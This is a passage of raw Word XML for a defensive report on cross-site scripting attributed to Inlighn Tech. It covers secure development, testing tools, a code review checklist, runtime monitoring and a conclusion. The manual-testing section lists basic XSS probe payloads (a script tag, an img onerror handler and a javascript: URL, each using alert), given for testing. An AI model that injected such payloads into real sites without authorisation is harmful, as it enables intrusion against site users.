          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Secure Development Practices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Conduct regular code reviews focusing on unsafe DOM methods, eval() usage, and missing encoding.</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Run automated SAST (Static Application Security Testing) tools in CI/CD pipelines.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Use OWASP ZAP or Burp Suite for dynamic security testing before production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Regular Security Testing</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Perform penetration testing with XSS-specific payloads across all input vectors.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Employ XSStrike or similar tools for automated XSS detection and payload fuzzing.</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Supplement automated scans with manual testing; automated tools miss DOM-based XSS variants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject common XSS test payloads across all input fields, URL parameters, headers, and cookie values. Observe whether the payload is rendered unsanitized:</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&lt;script&gt;alert('XSS')&lt;/script&gt;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&lt;img src='x' onerror='alert("XSS")'&gt;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 onmouseover="alert('XSS')"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7A5E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">javascript:alert('XSS')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Tools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OWASP ZAP — open-source web application scanner for XSS and other OWASP Top 10 vulnerabilities.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Burp Suite — intercept proxy with active/passive XSS scanning and intruder payloads.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XSStrike — specialized XSS detection engine with context-aware payload generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Code Review Checklist</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Search for unsafe sinks: innerHTML, document.write(), eval(), setTimeout(string).</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Verify all user-controlled values are encoded before HTML/JS/URL output.</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Check for missing HttpOnly on session cookies and absent or weak CSP headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime Monitoring</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Analyze server and WAF logs for suspicious encoding patterns or known XSS payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Runtime Application Self-Protection (RASP) to detect and block XSS at execution time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting remains a top-ranked web application vulnerability with serious real-world consequences. Its three primary forms — Reflected, Stored, and DOM-Based — each require tailored detection and prevention approaches. Effective XSS defence is never a single control; it demands a layered strategy combining rigorous input validation, context-sensitive output encoding, modern framework safeguards, strong HTTP security headers (especially CSP), secure cookie configuration, and continuous security testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Organizations that treat XSS as a box-ticking exercise rather than a fundamental secure development practice remain exposed to account compromise, data breaches, regulatory penalties, and lasting reputational damage. Integrating the mitigation strategies outlined in this report into the Software Development Lifecycle (SDLC) is essential to building and maintaining secure, trustworthy web applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A7A5E" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Report prepared by Inlighn Tech — Cybersecurity Division, 2025. For educational and internal security research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5E" w:sz="4" w:space="2"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="AAAAAA"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL — For Educational and Security Research Purposes</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="1A7A5E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	Confidential — Inlighn Tech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4" w:space="2"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="1A7A5E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Cross-Site Scripting (XSS) — Technical Security Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="AAAAAA"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Inlighn Tech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C2B2A"/>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1A7A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2026-05-12T04:11:22.747Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-12T04:11:22.747Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>